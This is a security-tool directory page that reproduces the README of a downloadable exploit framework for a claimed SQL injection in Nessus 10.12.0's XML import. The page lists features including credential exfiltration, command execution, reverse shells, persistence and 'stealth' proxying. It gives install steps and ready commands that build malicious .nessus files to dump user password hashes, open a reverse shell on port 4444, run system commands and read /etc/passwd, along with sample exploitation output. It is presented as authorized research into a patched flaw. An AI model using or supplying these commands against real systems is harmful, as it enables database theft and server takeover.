Skip to content
KitploitKITPLOIT
ToolsBlog
Log in
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2026-57588-Nessus-XML-Import-SQL-Injection-PoC — PoC for CVE-2026-57588 - SQL injection in Nessus 10.12.0 XML import. Generates malicious .nessus files to enumerate databases, exfiltrate credentials, and test time-based blind injection. For authorized security research. Author: Sudeepa Wanigarathna. Patched in 10.12.1. | Kitploit
Tools/GitHubGitHub/cerberusmrxi/cve-2026-57588-nessus-xml-import-sql-injection-poc
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationData ExfiltrationPost-ExploitationPenetration TestingCommand and ControlRed Teaming
Database Security
GitHubcerberusmrxi/cve-2026-57588-nessus-xml-import-sql-injection-poc

CVE-2026-57588-Nessus-XML-Import-SQL-Injection-PoC

PoC for CVE-2026-57588 - SQL injection in Nessus 10.12.0 XML import. Generates malicious .nessus files to enumerate databases, exfiltrate credentials, and test time-based blind injection. For authorized security research. Author: Sudeepa Wanigarathna. Patched in 10.12.1.

View Repository
1172 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

🛡️ CVE-2026-57588 - Nessus SQL Injection Exploitation Framework

Security Research CVE Version Python License


📋 Table of Contents

  • Overview
  • Vulnerability Details
  • Features
  • Installation
  • Quick Start
  • Usage Examples
  • Payload Types
  • Advanced Scenarios
  • Reporting
  • Troubleshooting
  • Security Considerations
  • License

🔍 Overview

CVE-2026-57588 is a critical SQL injection vulnerability discovered in Tenable Nessus versions 10.12.0 and prior. The vulnerability resides in the XML parsing mechanism when importing .nessus scan result files, allowing authenticated users with import privileges to execute arbitrary SQL queries against the backend PostgreSQL database.


⚠️ Vulnerability Details

PropertyValue
CVE IDCVE-2026-57588
Vulnerability TypeSQL Injection
Affected ProductsTenable Nessus 10.12.0 and prior
Fixed VersionNessus 10.12.1 and later
CVSS Score4.3 (Medium)
Attack VectorNetwork
Attack ComplexityLow
Privileges RequiredAuthenticated (Import permissions)
User InteractionRequired (Social engineering)
ImpactData exfiltration, RCE

🔬 Technical Details

The vulnerability exists due to insufficient sanitization of XML tag values before they are incorporated into SQL queries during the import process. A malicious actor can craft a .nessus file containing specially crafted SQL injection payloads in XML tags such as:

  • hostname
  • fqdn
  • os
  • system-type
  • mac-address
  • netbios-name

When a privileged user imports the malicious file, the unsanitized values are executed against the PostgreSQL backend, enabling:

  • Database enumeration
  • Data exfiltration
  • Command execution
  • File system access
  • Persistence installation

✨ Features

Click to expand feature list

🎯 Payload Management

  • 13+ payload types categorized by purpose
  • Template-based payload generation
  • Custom payload creation and validation
  • Parameter validation and syntax checking
  • SQL syntax verification

🚀 Exploitation Capabilities

  • Multi-stage exploitation with parallel execution
  • Database fingerprinting and enumeration
  • Data exfiltration with custom table/column selection
  • Command execution on target system
  • File system access and reading
  • Reverse shell with interactive session
  • Persistence installation mechanisms
  • Time-based blind SQL injection
  • Boolean-based blind SQL injection
  • Error-based SQL injection
  • Stacked queries for advanced exploitation
  • Out-of-band DNS exfiltration

📊 Reporting & Logging

  • HTML reports with professional styling
  • Markdown reports for documentation
  • JSON reports for automation
  • Text reports for quick review
  • Log rotation with multiple levels
  • Detailed execution statistics
  • File hashing for integrity verification

🛠️ Advanced Features

  • Parallel execution with configurable jobs
  • Proxy support for stealth operations
  • SSL/TLS certificate handling
  • XML validation and schema checking
  • Interactive mode for live exploitation
  • Retry mechanism for reliability
  • Timeout configuration for slow connections

📦 Professional Tooling

  • Subcommand-based CLI structure
  • Verbose and quiet modes
  • Colored terminal output
  • Progress indicators for long tasks
  • Docker support for containerized testing
  • Cross-platform compatibility (Linux, Windows, macOS)

📦 Installation

🐍 Prerequisites

  • Python 3.7 or higher
  • pip (Python package manager)
  • Git (optional, for cloning)

🔧 Quick Installation

# Clone the repository
git clone https://github.com/CerberusMrXi/CVE-2026-57588-Nessus-XML-Import-SQL-Injection-PoC
cd CVE-2026-57588-Nessus-XML-Import-SQL-Injection-PoC

# Create and activate virtual environment
python3 -m venv venv
source venv/bin/activate  # On Windows: venv\Scripts\activate

# Install dependencies
pip install -r requirements.txt

# Verify installation
python3 exploit.py --version

🐳 Docker Installation

# Build the Docker image
docker build -t nessus-exploit .

# Run the tool
docker run -it --rm nessus-exploit generate -u https://test.com -p enum

📦 Package Installation

# Install as a package
pip install -e .

# Now you can run from anywhere
nessus-exploit generate -u https://test.com -p enum

🚀 Quick Start

Basic Usage

# Generate a basic enumeration exploit
python3 exploit.py generate -u https://test.com -p enum

# Generate advanced multi-stage exploit
python3 exploit.py generate -u https://test.com -p advanced -o exploit.nessus

# Extract data from database
python3 exploit.py generate -u https://test.com -p dump --table nessus_users --columns username,password_hash,email

Command Help

# Show general help
python3 exploit.py --help

# Show generate command help
python3 exploit.py generate --help

# List all available payloads
python3 exploit.py list

💡 Usage Examples

1. Basic Enumeration

python3 exploit.py generate -u https://test.com -p enum
Expected Output
[2026-07-22 10:15:23] [INFO] [*] Starting exploitation against https://test.com
[2026-07-22 10:15:23] [INFO] [*] Session: xK9mN2pQ5wR8yV7tJ4sL3fG6hD1
[2026-07-22 10:15:23] [INFO] [*] Payload: enum
[2026-07-22 10:15:23] [INFO] [*] Executing stage: fingerprint
[2026-07-22 10:15:24] [INFO] [+] Generated XML: exploit_20260722_fingerprint_101523.nessus (3847 bytes)
[2026-07-22 10:15:24] [INFO] [*] Executing stage: schema_dump
[2026-07-22 10:15:25] [INFO] [+] Generated XML: exploit_20260722_schema_dump_101524.nessus (4213 bytes)
[2026-07-22 10:15:25] [INFO] [+] Exploitation complete! Duration: 2.15s

============================================================
EXPLOITATION SUMMARY
============================================================
Target: https://test.com
Status: SUCCESS
Duration: 2.15s
Files Generated: 3
Reports Generated: 3
============================================================

2. Advanced Multi-Stage Exploitation

python3 exploit.py generate -u https://test.com -p advanced -o custom.nessus -v

3. Data Exfiltration

# Extract user credentials
python3 exploit.py generate -u https://test.com -p dump --table nessus_users --columns username,password_hash,email

# Extract with custom columns
python3 exploit.py generate -u https://test.com -p dump --table scan_results --columns scan_name,start_time,status

4. Reverse Shell

# Start listener and generate exploit
python3 exploit.py generate -u https://test.com -p shell -lp 4444 -o shell.nessus

5. Command Execution

# Execute basic commands
python3 exploit.py generate -u https://test.com -p exec --command "whoami && id && uname -a"

# Execute complex commands
python3 exploit.py generate -u https://test.com -p exec --command "ps aux | grep nessus"

6. File Reading

# Read system files
python3 exploit.py generate -u https://test.com -p file -f /etc/passwd
Download Tool